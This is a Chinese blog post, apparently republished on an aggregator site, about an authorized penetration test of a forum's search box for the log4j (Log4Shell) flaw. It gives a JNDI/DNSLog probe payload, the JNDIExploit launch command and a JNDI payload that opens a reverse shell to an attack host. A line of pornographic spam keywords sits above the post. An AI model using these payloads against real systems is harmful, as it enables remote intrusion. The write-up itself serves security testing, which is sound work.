国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

【實(shí)戰(zhàn)】一次簡單的log4j漏洞測試

這篇具有很好參考價(jià)值的文章主要介紹了【實(shí)戰(zhàn)】一次簡單的log4j漏洞測試。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

更新時(shí)間:2021.12.19

參考文檔:https://www.yuque.com/u8021480/crow/dg9xax
在去年log4j漏洞剛爆發(fā)的時(shí)候,很多平臺都存在漏洞,當(dāng)時(shí)也在第一時(shí)間在有授權(quán)的情況下對某論壇進(jìn)行了滲透測試,結(jié)果發(fā)現(xiàn)存在漏洞,報(bào)告之后,漏洞也被很快修復(fù)。
本次對該滲透過程進(jìn)行一個(gè)簡單的記錄,整個(gè)過程非常的簡單,因?yàn)槁┒磩偝鰜?,也沒有什么waf,所以很快就拿下了。以下過程已進(jìn)行脫敏,漏洞均已修復(fù)。

1. Dnslog漏洞探測

云端攻擊機(jī)kali : 1x3.xxx.xx2.9
目標(biāo)機(jī):http://testxxx.cn/
中轉(zhuǎn)文件:JNDIExploit-1.2-SNAPSHOT.jar

1.1 payload描述

log4j漏洞中,一般構(gòu)造諸如:${jndi:ldap://6bbs.dnslog.cn/test}之類的漏洞,但是在很多時(shí)候,因?yàn)橛?code>//的存在,可能會觸發(fā)系統(tǒng)自動將其作為url鏈接訪問,導(dǎo)致誤判,因此在這里可以使用新的payload進(jìn)行測試:

${jndi:ldap://${sys:java.version}.335h25.dnslog.cn}

在這里可以顯示起版本信息,如果能夠顯示,則證明一定存在漏洞。

1.2 測試

去dnslog平臺申請一個(gè)域名:
gx.dnslog.cn

直接構(gòu)造:

${jndi:ldap://${sys:java.version}.gx.dnslog.cn}

然后在論壇的搜索框執(zhí)行:

【實(shí)戰(zhàn)】一次簡單的log4j漏洞測試
此時(shí)DNSLOG平臺有數(shù)據(jù),證明存在漏洞:

【實(shí)戰(zhàn)】一次簡單的log4j漏洞測試
既然存在漏洞,那就試試能否拿下RCE

2. log4j RCE

云端攻擊機(jī)kali : 1x3.xxx.xx2.9
目標(biāo)機(jī):http://testxxx.com/
中轉(zhuǎn)文件:JNDIExploit-1.2-SNAPSHOT.jar

2.1 準(zhǔn)備工作

直接在攻擊機(jī)上開啟JNDIExploit-1.2-SNAPSHOT.jar
命令如下:java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 攻擊機(jī)ip地址

【實(shí)戰(zhàn)】一次簡單的log4j漏洞測試
通過漏洞探尋得知測試派的搜索框存在log4j漏洞,直接在這里構(gòu)造exp即可:

${jndi:ldap://攻擊機(jī)ip:1389/Basic/ReverseShell/攻擊機(jī)ip/7777}

其中,去請求攻擊機(jī)的的1389端口,并且將shell反彈給攻擊機(jī)的7777端口。

在攻擊機(jī)上另啟一個(gè)命令行,監(jiān)聽7777端口:
【實(shí)戰(zhàn)】一次簡單的log4j漏洞測試

此時(shí)狀態(tài)如下:

【實(shí)戰(zhàn)】一次簡單的log4j漏洞測試

2.2 攻擊測試

直接在輸入框里面輸入上面構(gòu)造好的exp
【實(shí)戰(zhàn)】一次簡單的log4j漏洞測試

直接回車,shell就彈回來了:
【實(shí)戰(zhàn)】一次簡單的log4j漏洞測試

判斷當(dāng)前是物理機(jī)還是Docker

cat /proc/1/cgroup

【實(shí)戰(zhàn)】一次簡單的log4j漏洞測試
此時(shí)顯示為物理機(jī)。(參考資料:[https://blog.csdn.net/mar_ljh/article/details/109011822](https://blog.csdn.net/mar_ljh/article/details/109011822)

測試結(jié)束,開始寫報(bào)告。

3. 漏洞修復(fù)

https://mp.weixin.qq.com/s/O22KoaKFE11dmAR3DVPqBQ文章來源地址http://www.zghlxwxcb.cn/news/detail-425429.html

到了這里,關(guān)于【實(shí)戰(zhàn)】一次簡單的log4j漏洞測試的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 網(wǎng)絡(luò)安全 log4j漏洞復(fù)現(xiàn)

    網(wǎng)絡(luò)安全 log4j漏洞復(fù)現(xiàn)

    前言: log4j被爆出“史詩級”漏洞。其危害非常大,影響非常廣。該漏洞非常容易利用,可以執(zhí)行任意代碼。這個(gè)漏洞的影響可謂是重量級的。 漏洞描述: 由于Apache Log4j存在遞歸解析功能,未取得身份認(rèn)證的用戶,可以從遠(yuǎn)程發(fā)送數(shù)據(jù)請求輸入數(shù)據(jù)日志,輕松觸發(fā)漏洞,最

    2024年02月09日
    瀏覽(25)
  • log4j漏洞原理及攻擊流程

    log4j漏洞原理及攻擊流程

    log4j漏洞最早出現(xiàn)在2021年11月24日一位阿里安全團(tuán)隊(duì)的員工發(fā)現(xiàn)的,上報(bào)到Apache之后,12月10日凌晨才被公開。該漏洞威脅等級較高?;颈燃缗c阿里當(dāng)年的fastjson漏洞。 漏洞地址: Log4j是一種流行的Java日志記錄工具,其升級版本Log4j 2存在安全漏洞。這個(gè)漏洞是由Log4j 2的lookup功

    2024年02月16日
    瀏覽(26)
  • fastJson反序列化漏洞和log4j漏洞

    有 attach.class (編譯好的文件) 攻擊者建立rmi服務(wù)端,于rmi服務(wù)端建造一系列攻擊對象 ,假設(shè)遠(yuǎn)程地址為 http://abc,可url鏈接到惡意class-attach.class 若被攻擊者訪問到此服務(wù) rmi://abc/attach.class ,靜態(tài)代碼塊會優(yōu)先加載,無需構(gòu)造對象。 fastJson通過序列化漏洞 fastJson=1.2.47 (高版本添

    2024年02月16日
    瀏覽(24)
  • 深入解析著名的阿里云Log4j 漏洞

    幾乎每個(gè)系統(tǒng)都會使用日志框架,用于記錄日志信息,這些信息可以提供程序運(yùn)行的上下文,但是日志過多也會影響系統(tǒng)的性能,所以好的日志框架應(yīng)該是可靠,快速和可擴(kuò)展的。 Apache Log4j2 是一個(gè)基于 Java 的日志工具,是Log4j的升級版本,引入了很多豐富的特性,包括高性

    2024年02月16日
    瀏覽(21)
  • 【java安全】Log4j反序列化漏洞

    【java安全】Log4j反序列化漏洞

    關(guān)于Apache Log4j Log4j是Apache的開源項(xiàng)目,可以實(shí)現(xiàn)對System.out等打印語句的替代,并且可以結(jié)合spring等項(xiàng)目,實(shí)現(xiàn)把日志輸出到控制臺或文件等。而且它還可以通過一個(gè)配置文件來靈活地進(jìn)行配置,而不需要修改應(yīng)用的代碼,滿足了大多數(shù)要求。 就是用來打印日志的 漏洞成因

    2024年02月11日
    瀏覽(23)
  • 修復(fù)中間件log4j漏洞方案(直接更換漏洞jar包)

    修復(fù)中間件log4j漏洞方案(直接更換漏洞jar包)

    后臺服務(wù)里面的log4j漏洞我們已經(jīng)全部升級處理了,但是一些中間件鏡像包里的log4j漏洞需要單獨(dú)處理 解決辦法以ElasticSearch7.6.2為例: (1)找到容器里面有哪些舊的log4j依賴包 (2)去官網(wǎng)找到對應(yīng)新版本的依賴包 (3)把新的依賴包復(fù)制到和舊的同文件夾下 (4)刪除舊的依

    2024年02月10日
    瀏覽(33)
  • Web網(wǎng)絡(luò)安全-----Log4j高危漏洞原理及修復(fù)

    Web網(wǎng)絡(luò)安全-----Log4j高危漏洞原理及修復(fù)

    Web網(wǎng)絡(luò)安全-----紅藍(lán)攻防之信息收集 Log4j 即 log for java(java的日志) ,是Apache的一個(gè)開源項(xiàng)目,通過使用Log4j,我們可以控制日志信息輸送的目的地是控制臺、文件、GUI組件,甚至是套接口服務(wù)器、NT的事件記錄器、UNIX Syslog守護(hù)進(jìn)程等;我們也可以控制每一條日志的輸出格式;

    2024年02月10日
    瀏覽(24)
  • CVE-2021-44228 Apache log4j 遠(yuǎn)程命令執(zhí)行漏洞

    CVE-2021-44228 Apache log4j 遠(yuǎn)程命令執(zhí)行漏洞

    一、漏洞原理 log4j(log for java)是由Java編寫的可靠、靈活的日志框架,是Apache旗下的一個(gè)開源項(xiàng)目,使用Log4j,我們更加方便的記錄了日志信息,它不但能控制日志輸出的目的地,也能控制日志輸出的內(nèi)容格式;通過定義不同的日志級別,可以更加精確的控制日志的生成過程,

    2024年02月08日
    瀏覽(33)
  • Web攻防--JNDI注入--Log4j漏洞--Fastjson反序列化漏洞

    Web攻防--JNDI注入--Log4j漏洞--Fastjson反序列化漏洞

    什么是JNDI JNDI全稱為 Java Naming and Directory Interface(Java命名和目錄接口),是一組應(yīng)用程序接口,為開發(fā)人員查找和訪問各種資源提供了統(tǒng)一的通用接口,可以用來定義用戶、網(wǎng)絡(luò)、機(jī)器、對象和服務(wù)等各種資源。 JNDI支持的服務(wù)主要有:DNS、LDAP、CORBA、RMI等。 簡單從安全角度

    2024年02月09日
    瀏覽(26)
  • Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

    Log4j反序列化命令執(zhí)行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

    Apache Log4j是一個(gè)用于Java的日志記錄庫,其支持啟動遠(yuǎn)程日志服務(wù)器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻擊者可利用該漏洞執(zhí)行任意代碼 環(huán)境:vulhub 工具下載地址: ysoserial 利用工具生成payload: 1.創(chuàng)建文件 進(jìn)入容器內(nèi)部,查看文件創(chuàng)建成功 2.查看反彈的shell 有點(diǎn)

    2024年02月11日
    瀏覽(36)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包